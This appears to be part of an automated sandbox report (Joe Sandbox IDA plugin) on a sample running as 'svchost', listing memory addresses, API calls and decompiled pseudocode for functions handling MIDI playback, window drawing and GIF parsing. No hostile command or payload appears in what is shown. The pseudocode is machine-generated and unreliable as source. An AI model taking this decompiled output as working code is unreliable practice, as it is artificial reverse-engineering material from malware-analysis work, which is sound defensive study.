    0x0048123b
    0x0048123b
    0x0048123e
    0x00000000
    0x00000000
    0x00481244
    0x00481244
    0x00481247
    0x00000000
    0x00000000
    0x0048124d
    0x0048124d
    0x0048124e
    0x00000000
    0x00000000
    0x00481254
    0x00481254
    0x00481255
    0x004812eb
    0x004812eb
    0x004812f1
    0x004812f4
    0x004812f6
    0x004812f6
    0x004812fe
    0x00481303
    0x0048130c
    0x0048130d
    0x00481314
    0x00481317
    0x00481321
    0x00481327
    0x0048132c
    0x00000000
    0x0048132c
    0x0048125b
    0x0048125c
    0x00000000
    0x00000000
    0x00000000
    0x004812d0
    0x004812d0
    0x004812d0
    0x004812d2
    0x004812d4
    0x004812d6
    0x004812d8
    0x004812d8
    0x004812d6
    0x004812da
    0x004812dd
    0x004812e3
    0x004812e3
    0x00481377
    0x00481377
    0x00000000
    0x00481377
    0x004812ca
    0x004812b2
    0x004812b4
    0x00000000
    0x004812b4
    0x0048126e
    0x0048126e
    0x00481273
    0x0048129b
    0x0048129b
    0x004812a1
    0x00000000
    0x004812a1
    0x00481275
    0x00481275
    0x00481278
    0x00481284
    0x00481284
    0x0048128b
    0x0048128e
    0x00481290
    0x00000000
    0x00000000
    0x00481293
    0x00481298
    0x00000000
    0x00481298
    0x0048127a
    0x0048127a
    0x0048127d
    0x00000000
    0x00000000
    0x0048127f
    0x00481282
    0x00000000
    0x00000000
    0x00000000
    0x00481282
    0x004811e3
    0x00000000
    0x00000000
    0x004811e9
    0x004811e9
    0x004811ec
    0x00000000
    0x00000000
    0x004811f4
    0x004811f5
    0x004811f5
    0x004811f7
    0x00000000
    0x00000000
    0x004811fd
    0x004811fd
    0x004811ff
    0x00000000
    0x00000000
    0x00481205
    0x00481205
    0x00481207
    0x00000000
    0x00000000
    0x0048120d
    0x0048120d
    0x00481212
    0x00000000
    0x00000000
    0x00481218
    0x0048121a
    0x00000000
    0x00000000
    0x00000000
    0x0048121a
    0x004811a4
    0x004811a4
    0x004811a7
    0x00000000
    0x00000000
    0x004811aa
    0x004811aa
    0x004811ab
    0x00000000
    0x00000000
    0x004811ad
    0x004811ad
    0x004811b0
    0x004811c0
    0x00000000
    0x004811c0
    0x004811b2
    0x004811b5
    0x00000000
    0x00000000
    0x004811b7
    0x00000000
    0x004811b7
    0x00481168
    0x0048116b
    0x00000000
    0x0048116b
    0x00481135
    0x00481137
    0x00481138
    0x0048113b
    0x00481175
    0x0048117a
    0x0048117b
    0x0048117d
    0x0048117d
    0x0048117f
    0x00481181
    0x00000000
    0x00000000
    0x00481186
    0x00481187
    0x0048118c
    0x0048118f
    0x00000000
    0x00000000
    0x00481192
    0x00481197
    0x00481198
    0x00481198
    0x00000000
    0x0048117d
    0x0048113d
    0x0048113d
    0x0048113d
    0x00481145
    0x0048114e
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x004810be
    0x004810be
    0x004810c0
    0x004810c8
    0x004810ca
    0x004810db
    0x004810dd
    0x00000000
    0x00000000
    0x004810df
    0x004810e1
    0x00000000
    0x00000000
    0x004810e3
    0x004810e5
    0x00000000
    0x00000000
    0x004810e7
    0x004810e9
    0x00000000
    0x00000000
    0x00000000
    0x004810e9
    0x004810cc
    0x004810d6
    0x004810c2
    0x004810c2
    0x004810c2
    0x004810eb
    0x004810f1
    0x004810f3
    0x004810f4
    0x004810f6
    0x004810fd
    0x00000000
    0x00000000
    0x00000000
    0x004810fd
    0x0048139c
    0x004813a9
    0x004813c1

    APIs
    • lstrlen.KERNEL32(?,^I,?,?), ref: 004812B8
    Strings
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: lstrlen
    • String ID: %*.*f$I64$^I
    • API String ID: 1659193697-3458361620
    • Opcode ID: 6d10e7a5f28ad1e13bb37acea62b9423f4d609f69987ba439c865b1b84b4a454
    • Instruction ID: b3e8c289641e53a1f45ba24b4284ba3d53b9f4b839c1894564bd4699f4080610
    • Opcode Fuzzy Hash: 6d10e7a5f28ad1e13bb37acea62b9423f4d609f69987ba439c865b1b84b4a454
    • Instruction Fuzzy Hash: BE915972800145ABEB21BE6995486FE77AC9B06324F18886BEC40E7771D73CCE43975D
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 95%
    			E00428EB0(long __ecx) {
    				int _v4;
    				int _v8;
    				int _v12;
    				int _v16;
    				int _v20;
    				void _v84;
    				intOrPtr _v88;
    				char _v92;
    				int _v96;
    				long _v116;
    				intOrPtr _v128;
    				HMIDISTRM* _t128;
    				intOrPtr _t132;
    				intOrPtr _t135;
    				int _t139;
    				struct midihdr_tag _t143;
    				intOrPtr _t146;
    				void* _t147;
    				void* _t159;
    				int _t168;
    				int _t184;
    				signed int _t220;
    				signed int _t236;
    				void* _t256;
    				long _t257;
    				intOrPtr _t263;
    				void* _t266;
    				void* _t268;
    
    				_t266 =  &_v96;
    				_t262 = __ecx;
    				_t128 = __ecx + 0x1c;
    				_v96 = 0;
    				if( *(__ecx + 0x1c) != 0) {
    					L3:
    					_v20 = 0;
    					_v16 = 0;
    					_v12 = 0;
    					_v8 = 0;
    					_v4 = 0;
    					memset( &_v84, 0, 0x10 << 2);
    					_t256 = _t262 + 0x7c;
    					_t132 = E00429EB0( *((intOrPtr*)(_t262 + 0x84)),  *((intOrPtr*)(_t262 + 0x84)),  *((intOrPtr*)(_t262 + 0x80)));
    					_t268 = _t266 + 0x18;
    					_t263 = _t132;
    					E0043D380( *((intOrPtr*)(_t256 + 8)), _t263,  *((intOrPtr*)(_t256 + 8)));
    					 *((intOrPtr*)(_t256 + 8)) = _t263;
    					_t135 =  *((intOrPtr*)(_t256 + 4));
    					if(_t135 == 0 || (0x30c30c31 * (_t263 - _t135) >> 0x20 >> 4) + (0x30c30c31 * (_t263 - _t135) >> 0x20 >> 4 >> 0x1f) < 2) {
    						E00429B20(_t256,  *((intOrPtr*)(_t256 + 8)), 2 - E00429AF0(_t256),  &_v84);
    					} else {
    						if(E00429AF0(_t256) > 2) {
    							E00429E30(_t256,  *((intOrPtr*)(_t256 + 4)) + 0xa8,  *((intOrPtr*)(_t256 + 8)));
    						}
    					}
    					_v92 = 8;
    					_v88 =  *((intOrPtr*)(_t262 + 0x14));
    					_t139 = midiStreamProperty( *(_t262 + 0x1c),  &_v92, 0x80000001);
    					if(_t139 == 0) {
    						 *((intOrPtr*)(_t262 + 0x48)) = 0;
    						_t257 = 1;
    						 *(_t262 + 0x40) = 0;
    						while(1) {
    							 *((intOrPtr*)( *((intOrPtr*)(_t262 + 0x80)) + 4 + ( *(_t262 + 0x40) * 8 -  *(_t262 + 0x40) + ( *(_t262 + 0x40) * 8 -  *(_t262 + 0x40)) * 2) * 4)) = 0x400;
    							_t143 = E00483003(0x400);
    							_t268 = _t268 + 4;
    							 *( *((intOrPtr*)(_t262 + 0x80)) + ( *(_t262 + 0x40) * 8 -  *(_t262 + 0x40) + ( *(_t262 + 0x40) * 8 -  *(_t262 + 0x40)) * 2) * 4) = _t143;
    							_t236 =  *(_t262 + 0x40) * 8 -  *(_t262 + 0x40) + ( *(_t262 + 0x40) * 8 -  *(_t262 + 0x40)) * 2;
    							_t146 =  *((intOrPtr*)(_t262 + 0x80));
    							_t147 = _t146 + _t236 * 4;
    							if( *((intOrPtr*)(_t146 + _t236 * 4)) == 0) {
    								goto L10;
    							}
    							 *((intOrPtr*)(_t147 + 0x40)) = 0;
    							 *((intOrPtr*)( *((intOrPtr*)(_t262 + 0x80)) + 0x44 + ( *(_t262 + 0x40) * 8 -  *(_t262 + 0x40) + ( *(_t262 + 0x40) * 8 -  *(_t262 + 0x40)) * 2) * 4)) = 0x400;
    							 *((intOrPtr*)( *((intOrPtr*)(_t262 + 0x80)) + 0x4c + ( *(_t262 + 0x40) * 8 -  *(_t262 + 0x40) + ( *(_t262 + 0x40) * 8 -  *(_t262 + 0x40)) * 2) * 4)) = 0;
    							 *((intOrPtr*)( *((intOrPtr*)(_t262 + 0x80)) + 0x50 + ( *(_t262 + 0x40) * 8 -  *(_t262 + 0x40) + ( *(_t262 + 0x40) * 8 -  *(_t262 + 0x40)) * 2) * 4)) = 0;
    							_push( *((intOrPtr*)(_t262 + 0x80)) + ( *(_t262 + 0x40) * 8 -  *(_t262 + 0x40) + ( *(_t262 + 0x40) * 8 -  *(_t262 + 0x40)) * 2) * 4);
    							_push(_t257);
    							_t159 = E00428720(_t262);
    							if(_t159 == 0) {
    								L16:
    								 *((intOrPtr*)(_t262 + 0x80)) + ( *(_t262 + 0x40) * 8 -  *(_t262 + 0x40) + ( *(_t262 + 0x40) * 8 -  *(_t262 + 0x40)) * 2) * 4->dwBytesRecorded =  *( *((intOrPtr*)(_t262 + 0x80)) + 0x48 + ( *(_t262 + 0x40) * 8 -  *(_t262 + 0x40) + ( *(_t262 + 0x40) * 8 -  *(_t262 + 0x40)) * 2) * 4);
    								if( *(_t262 + 0x3c) != 0) {
    									L18:
    									_t168 = midiStreamOut( *(_t262 + 0x1c),  *((intOrPtr*)(_t262 + 0x80)) + ( *(_t262 + 0x40) * 8 -  *(_t262 + 0x40) + ( *(_t262 + 0x40) * 8 -  *(_t262 + 0x40)) * 2) * 4, 0x40);
    									if(_t168 != 0) {
    										 *((intOrPtr*)( *_t262 + 4))(_t168);
    										goto L23;
    									} else {
    										_t257 = 0;
    										if(_v128 != 0) {
    											L23:
    											 *(_t262 + 0x40) = 0;
    											 *(_t262 + 0x3c) = 1;
    											return 1;
    										} else {
    											_t220 =  *(_t262 + 0x40) + 1;
    											 *(_t262 + 0x40) = _t220;
    											if(_t220 < 2) {
    												continue;
    											} else {
    												 *(_t262 + 0x40) = 0;
    												 *(_t262 + 0x3c) = 1;
    												return 1;
    											}
    										}
    									}
    								} else {
    									_t139 = midiOutPrepareHeader( *(_t262 + 0x1c),  *((intOrPtr*)(_t262 + 0x80)) + ( *(_t262 + 0x40) * 8 -  *(_t262 + 0x40) + ( *(_t262 + 0x40) * 8 -  *(_t262 + 0x40)) * 2) * 4, 0x40);
    									if(_t139 != 0) {
    										goto L9;
    									} else {
    										goto L18;
    									}
    								}
    							} else {
    								if(_t159 != 0xffffff99) {
    									goto L10;
    								} else {
    									_v116 = 1;
    									goto L16;
    								}
    							}
    							goto L24;
    						}
    						goto L10;
    					} else {
    						L9:
    						 *((intOrPtr*)( *_t262 + 4))(_t139);
    						L10:
    						return 0;
    					}
    				} else {
    					_t184 = midiStreamOpen(_t128, __ecx + 0x44, 1, E004294D0, __ecx, 0x30000);
    					if(_t184 == 0) {
    						goto L3;
    					} else {
    						_push(_t184);
    						 *((intOrPtr*)( *__ecx + 4))();
    						return 0;
    					}
    				}
    				L24:
    			}
    0x00428eb0
    0x00428eb6
    0x00428ebd
    0x00428ec3
    0x00428ec7
    0x00428ef7
    0x00428f02
    0x00428f06
    0x00428f0a
    0x00428f0e
    0x00428f12
    0x00428f16
    0x00428f24
    0x00428f2a
    0x00428f2f
    0x00428f32
    0x00428f3b
    0x00428f40
    0x00428f43
    0x00428f48
    0x00428f7e
    0x00428f85
    0x00428f8f
    0x00428fa0
    0x00428fa0
    0x00428f8f
    0x00428fb6
    0x00428fbe
    0x00428fc2
    0x00428fca
    0x00428fde
    0x00428fe1
    0x00428fe6
    0x00428fee
    0x00429004
    0x00429008
    0x00429010
    0x00429025
    0x00429034
    0x00429037
    0x00429040
    0x00429045
    0x00000000
    0x00000000
    0x00429047
    0x0042905f
    0x00429078
    0x00429091
    0x004290af
    0x004290b0
    0x004290b1
    0x004290b8
    0x004290cb
    0x004290e7
    0x004290ef
    0x0042911e
    0x0042913d
    0x00429145
    0x0042917b
    0x00000000
    0x00429147
    0x0042914b
    0x0042914f
    0x0042917e
    0x00429183
    0x00429186
    0x00429190
    0x00429151
    0x00429154
    0x00429157
    0x0042915d
    0x00000000
    0x00429163
    0x00429168
    0x0042916b
    0x00429175
    0x00429175
    0x0042915d
    0x0042914f
    0x004290f1
    0x00429110
    0x00429118
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00429118
    0x004290ba
    0x004290bd
    0x00000000
    0x004290c3
    0x004290c3
    0x00000000
    0x004290c3
    0x004290bd
    0x00000000
    0x004290b8
    0x00000000
    0x00428fcc
    0x00428fcc
    0x00428fd1
    0x00428fd4
    0x00428fdd
    0x00428fdd
    0x00428ec9
    0x00428edb
    0x00428ee3
    0x00000000
    0x00428ee5
    0x00428ee7
    0x00428eea
    0x00428ef6
    0x00428ef6
    0x00428ee3
    0x00000000

    APIs
    • midiStreamOpen.WINMM(?,?,00000001,004294D0,?,00030000,?,?,?,00000000), ref: 00428EDB
    • midiStreamProperty.WINMM ref: 00428FC2
    • midiOutPrepareHeader.WINMM(?,?,00000040,00000001,?,?,?,?,00000000), ref: 00429110
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: midi$Stream$HeaderOpenPrepareProperty
    • String ID:
    • API String ID: 2061886437-0
    • Opcode ID: 554028de30fd090a4dcf25fa6e14741ac43f029ccdeed02f786ec0617b5a9cb7
    • Instruction ID: 9da555949d9da46b87808de96a6bf133a0d787d847d77e9708509d02c9e93ceb
    • Opcode Fuzzy Hash: 554028de30fd090a4dcf25fa6e14741ac43f029ccdeed02f786ec0617b5a9cb7
    • Instruction Fuzzy Hash: 76A17B713006168FD724DF28D990BAAB7F6FB84304F51492EE686C7650EB35F919CB40
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 78%
    			E00426FC0(void* __ecx, signed long long __fp0) {
    				void* _t50;
    				signed char _t51;
    				int _t54;
    				int _t64;
    				signed int _t66;
    				int _t68;
    				signed int _t70;
    				signed int _t78;
    				int _t79;
    				signed int _t82;
    				int _t83;
    				int _t101;
    				int _t103;
    				void* _t106;
    				void* _t107;
    				signed long long _t116;
    
    				_t114 = __fp0;
    				_t106 = __ecx;
    				GetClientRect( *(__ecx + 0x1c), _t107 + 0x30);
    				_t103 =  *((intOrPtr*)(_t107 + 0x3c)) -  *((intOrPtr*)(_t107 + 0x34));
    				_t50 = _t106 + 0xf8;
    				_t101 =  *((intOrPtr*)(_t107 + 0x40)) -  *(_t107 + 0x38);
    				 *(_t107 + 0x1c) = _t103;
    				 *(_t107 + 0x20) = _t101;
    				if(_t50 == 0 ||  *((intOrPtr*)(_t50 + 4)) == 0) {
    					_t78 =  *(_t107 + 0x48);
    				} else {
    					_t78 =  *(_t107 + 0x48);
    					 *(_t107 + 0x1c) = E00489512(_t78, _t50);
    					PatBlt( *(_t78 + 4),  *(_t107 + 0x38),  *(_t107 + 0x38), _t103, _t101, 0xf00021);
    					E00489512(_t78,  *(_t107 + 0x18));
    				}
    				_t51 =  *(_t106 + 0xf4);
    				 *(_t107 + 0x18) = _t51;
    				if(_t51 == 0) {
    					L22:
    					return 0x1335437;
    				} else {
    					if( *((intOrPtr*)(_t106 + 0x100)) != 1 ||  *_t51 != 5) {
    						_t82 =  *(_t106 + 0xd0);
    						 *(_t107 + 0x14) = 0;
    						__eflags = _t82 - 2;
    						 *(_t107 + 0x10) = 0;
    						if(_t82 != 2) {
    							__eflags = _t82;
    							if(__eflags == 0) {
    								_t79 = _t78 | 0xffffffff;
    								_t83 = _t82 | 0xffffffff;
    								__eflags = _t83;
    							} else {
    								_t79 = _t103;
    								_t83 = _t101;
    							}
    						} else {
    							_t79 =  *(_t51 + 4);
    							_t83 =  *(_t51 + 8);
    							__eflags = _t79 - _t103;
    							 *(_t107 + 0x24) = _t79;
    							 *(_t107 + 0x2c) = _t83;
    							if(_t79 <= _t103) {
    								_t68 = _t103;
    								_t103 = _t79;
    								 *(_t107 + 0x1c) = _t103;
    								asm("cdq");
    								_t70 = _t68 - _t79;
    								__eflags = _t70;
    								 *(_t107 + 0x14) = _t70 >> 1;
    								_t51 =  *(_t107 + 0x18);
    							}
    							__eflags = _t83 - _t101;
    							if(_t83 <= _t101) {
    								_t64 = _t101;
    								_t101 = _t83;
    								 *(_t107 + 0x20) = _t101;
    								asm("cdq");
    								_t66 = _t64 - _t83;
    								__eflags = _t66;
    								 *(_t107 + 0x10) = _t66 >> 1;
    								_t51 =  *(_t107 + 0x18);
    							}
    							__eflags = _t79 - _t103;
    							if(_t79 > _t103) {
    								L15:
    								asm("fild dword [esp+0x24]");
    								asm("fild dword [esp+0x1c]");
    								asm("fild dword [esp+0x2c]");
    								asm("fst qword [esp+0x24]");
    								asm("fild dword [esp+0x20]");
    								_t116 = _t114 / st1 / st1;
    								 *(_t107 + 0x2c) = _t116;
    								st0 = _t116;
    								asm("fcom qword [esp+0x2c]");
    								asm("fnstsw ax");
    								__eflags = _t51 & 0x00000001;
    								if((_t51 & 0x00000001) == 0) {
    									st0 = _t116;
    									_t116 =  *(_t107 + 0x2c);
    								}
    								asm("fxch st0, st1");
    								_t54 = E00470388();
    								_t114 =  *(_t107 + 0x24) * st1;
    								_t79 = _t54;
    								_t83 = E00470388();
    								asm("cdq");
    								st0 =  *(_t107 + 0x24) * st1;
    								 *(_t107 + 0x14) =  *(_t107 + 0x14) + (_t103 - _t79 >> 1);
    								asm("cdq");
    								_t51 =  *(_t107 + 0x18);
    								 *(_t107 + 0x10) =  *(_t107 + 0x10) + (_t101 - _t83 >> 1);
    							} else {
    								__eflags = _t83 - _t101;
    								if(__eflags > 0) {
    									goto L15;
    								}
    							}
    						}
    						_push( *((intOrPtr*)(_t106 + 0xdc)));
    						_push(_t83);
    						_push(_t79);
    						_push( *(_t107 + 0x18));
    						E00426120(__eflags, _t114, _t51,  *((intOrPtr*)(_t107 + 0x58)),  *(_t107 + 0x18));
    						goto L22;
    					} else {
    						E0043A6C0(_t106, _t114, _t78);
    						return 0x1335437;
    					}
    				}
    			}
    0x00426fc0
    0x00426fc5
    0x00426fd2
    0x00426fe4
    0x00426fea
    0x00426ff0
    0x00426ff2
    0x00426ff8
    0x00426ffc
    0x0042703e
    0x00427005
    0x00427005
    0x0042701d
    0x0042702a
    0x00427037
    0x00427037
    0x00427042
    0x0042704c
    0x00427050
    0x0042718b
    0x00427194
    0x00427056
    0x0042705d
    0x0042707b
    0x00427081
    0x00427085
    0x00427088
    0x0042708c
    0x00427157
    0x00427159
    0x00427161
    0x00427164
    0x00427164
    0x0042715b
    0x0042715b
    0x0042715d
    0x0042715d
    0x00427092
    0x00427092
    0x00427095
    0x00427098
    0x0042709a
    0x0042709e
    0x004270a2
    0x004270a4
    0x004270a6
    0x004270aa
    0x004270ae
    0x004270af
    0x004270af
    0x004270b3
    0x004270b7
    0x004270b7
    0x004270bb
    0x004270bd
    0x004270bf
    0x004270c1
    0x004270c5
    0x004270c9
    0x004270ca
    0x004270ca
    0x004270ce
    0x004270d2
    0x004270d2
    0x004270d6
    0x004270d8
    0x004270e2
    0x004270e2
    0x004270e6
    0x004270ec
    0x004270f0
    0x004270f4
    0x004270f8
    0x004270fa
    0x004270fe
    0x00427100
    0x00427104
    0x00427106
    0x00427109
    0x0042710b
    0x0042710d
    0x0042710d
    0x00427111
    0x00427115
    0x0042711e
    0x00427120
    0x00427127
    0x00427131
    0x00427132
    0x0042713e
    0x00427142
    0x0042714d
    0x00427151
    0x004270da
    0x004270da
    0x004270dc
    0x00000000
    0x00000000
    0x004270dc
    0x004270d8
    0x0042716d
    0x00427172
    0x00427177
    0x00427178
    0x00427180
    0x00000000
    0x00427064
    0x00427067
    0x00427078
    0x00427078
    0x0042705d

    APIs
    • GetClientRect.USER32(?,?), ref: 00426FD2
    • PatBlt.GDI32(?,?,?,?,?,00F00021), ref: 0042702A
    • __ftol.LIBCMT ref: 00427115
    • __ftol.LIBCMT ref: 00427122
      • Part of subcall function 00489512: SelectObject.GDI32(?,00000000), ref: 00489534
      • Part of subcall function 00489512: SelectObject.GDI32(?,?), ref: 0048954A
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: ObjectSelect__ftol$ClientRect
    • String ID:
    • API String ID: 2514210182-0
    • Opcode ID: 3f3e95b9d2868db02fd8f6cfb5fe4685dc828623b49a579deca4b59512eea40c
    • Instruction ID: dba1a07e886497a340d2ae7955062ab8760e11ff337f9d6d2ffbce8923c81c9e
    • Opcode Fuzzy Hash: 3f3e95b9d2868db02fd8f6cfb5fe4685dc828623b49a579deca4b59512eea40c
    • Instruction Fuzzy Hash: 15519AB17083129BC714CF29D98086BBBE5BFD8340F548A2EF88993351D634DD498B96
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0043AF80(void* __ecx) {
    				void* _t74;
    				intOrPtr _t76;
    				void* _t81;
    				signed int _t92;
    				void* _t93;
    				void* _t98;
    				void* _t107;
    				signed int _t113;
    				unsigned int _t125;
    				signed int _t126;
    				intOrPtr _t150;
    				void* _t152;
    				void* _t154;
    				char* _t155;
    				void* _t156;
    				void* _t161;
    
    				_t107 = __ecx;
    				E0043A9B0(__ecx);
    				_t72 =  *((intOrPtr*)(__ecx + 0xa8));
    				if( *((intOrPtr*)(__ecx + 0xa8)) != 0) {
    					E0048302C(_t72);
    					_t157 = _t157 + 4;
    				}
    				_t73 =  *(_t107 + 0xb0);
    				if( *(_t107 + 0xb0) != 0) {
    					E0048302C(_t73);
    					_t157 = _t157 + 4;
    				}
    				_t74 =  *(_t107 + 0xc0);
    				if(_t74 != 0) {
    					DeleteObject(_t74);
    					 *(_t107 + 0xc0) = 0;
    				}
    				_t150 =  *((intOrPtr*)(_t157 + 0x18));
    				 *(_t107 + 0xb0) = 0;
    				 *(_t107 + 0xa8) = 0;
    				 *((intOrPtr*)(_t107 + 0x94)) = 0;
    				 *(_t107 + 0x80) = 0;
    				 *(_t107 + 0x74) = 0;
    				if(_t150 <= 0xd) {
    					L17:
    					return 0;
    				} else {
    					_t155 =  *((intOrPtr*)(_t157 + 0x14));
    					if( *_t155 != 0x47 ||  *((char*)(_t155 + 1)) != 0x49 ||  *((char*)(_t155 + 2)) != 0x46 ||  *((char*)(_t155 + 3)) != 0x38) {
    						goto L17;
    					} else {
    						_t76 =  *((intOrPtr*)(_t155 + 4));
    						if(_t76 == 0x37 || _t76 == 0x39) {
    							if( *((char*)(_t155 + 5)) != 0x61) {
    								goto L17;
    							} else {
    								 *((intOrPtr*)(_t107 + 0xd4)) = 0;
    								 *((intOrPtr*)(_t107 + 0xd8)) = 0;
    								 *((intOrPtr*)(_t107 + 0x70)) = 0;
    								if(( *(_t155 + 0xa) & 0x00000080) == 0) {
    									_t156 = _t155 + 0xd;
    									goto L20;
    								} else {
    									 *(_t107 + 0x80) = 1;
    									_t98 = E00483003(0xbadbaf);
    									_t161 = _t157 + 4;
    									 *(_t107 + 0xa8) = _t98;
    									_t125 =  *(_t107 + 0x80) +  *(_t107 + 0x80) * 2;
    									if(_t150 > _t125 + 0xd) {
    										_t154 = _t155 + 0xd;
    										_t126 = _t125 >> 2;
    										memcpy(_t154 + _t126 + _t126, _t154, memcpy(_t98, _t154, _t126 << 2) & 0x00000003);
    										_t157 = _t161 + 0x18;
    										_t150 =  *((intOrPtr*)(_t161 + 0x30));
    										_t156 =  *(_t107 + 0x80) + _t155 + 0xd +  *(_t107 + 0x80) * 2;
    										L20:
    										_t47 = _t150 -  *(_t107 + 0x80) +  *(_t107 + 0x80) * 2 - 0xd; // -13
    										 *(_t107 + 0x74) = _t47;
    										_t81 = E00483003(_t47);
    										 *(_t107 + 0xb0) = _t81;
    										 *(_t107 + 0xb4) = _t81;
    										_t152 = _t156;
    										_t113 =  *(_t107 + 0x74) >> 2;
    										memcpy(_t152 + _t113 + _t113, _t152, memcpy(_t81, _t152, _t113 << 2) & 0x00000003);
    										 *(_t107 + 0xcc) = 0;
    										if( *((intOrPtr*)(_t107 + 0xe8)) == 0) {
    											 *(_t107 + 0xa4) = GetDC( *(_t107 + 0x1c));
    											 *(_t107 + 0xc0) = E0043B1B0(_t107);
    											ReleaseDC( *(_t107 + 0x1c),  *(_t107 + 0xa4));
    											 *(_t107 + 0xa4) = 0;
    											_t92 = 0 |  *((intOrPtr*)(_t107 + 0x94)) -  *(_t107 + 0x74) - 0x00000001 >= 0x00000000;
    											 *(_t107 + 0xcc) = _t92;
    											if(_t92 == 0) {
    												_t93 =  *(_t107 + 0xc0);
    												if(_t93 != 0) {
    													DeleteObject(_t93);
    													 *(_t107 + 0xc0) = 0;
    												}
    												 *((intOrPtr*)(_t107 + 0x94)) = 0;
    												 *(_t107 + 0xb4) =  *(_t107 + 0xb0);
    											}
    										}
    										return 1;
    									} else {
    										E0048302C(_t98);
    										 *(_t107 + 0xa8) = 0;
    										 *(_t107 + 0x80) = 0;
    										goto L17;
    									}
    								}
    							}
    						} else {
    							goto L17;
    						}
    					}
    				}
    			}
    0x0043af84
    0x0043af86
    0x0043af8b
    0x0043af95
    0x0043af98
    0x0043af9d
    0x0043af9d
    0x0043afa0
    0x0043afa8
    0x0043afab
    0x0043afb0
    0x0043afb0
    0x0043afb3
    0x0043afbb
    0x0043afbe
    0x0043afc4
    0x0043afc4
    0x0043afca
    0x0043afce
    0x0043afd7
    0x0043afdd
    0x0043afe3
    0x0043afe9
    0x0043afec
    0x0043b0a2
    0x0043b0a5
    0x0043aff2
    0x0043aff2
    0x0043affa
    0x00000000
    0x0043b01e
    0x0043b01e
    0x0043b023
    0x0043b02d
    0x00000000
    0x0043b02f
    0x0043b039
    0x0043b043
    0x0043b04c
    0x0043b055
    0x0043b0ce
    0x00000000
    0x0043b057
    0x0043b062
    0x0043b06c
    0x0043b077
    0x0043b07a
    0x0043b080
    0x0043b088
    0x0043b0ac
    0x0043b0af
    0x0043b0b9
    0x0043b0b9
    0x0043b0c1
    0x0043b0c8
    0x0043b0d1
    0x0043b0dc
    0x0043b0e0
    0x0043b0e3
    0x0043b0eb
    0x0043b0f1
    0x0043b0fb
    0x0043b0fd
    0x0043b10a
    0x0043b116
    0x0043b11c
    0x0043b12a
    0x0043b13b
    0x0043b146
    0x0043b15a
    0x0043b160
    0x0043b165
    0x0043b16b
    0x0043b16d
    0x0043b175
    0x0043b178
    0x0043b17e
    0x0043b17e
    0x0043b18a
    0x0043b190
    0x0043b190
    0x0043b16b
    0x0043b19f
    0x0043b08a
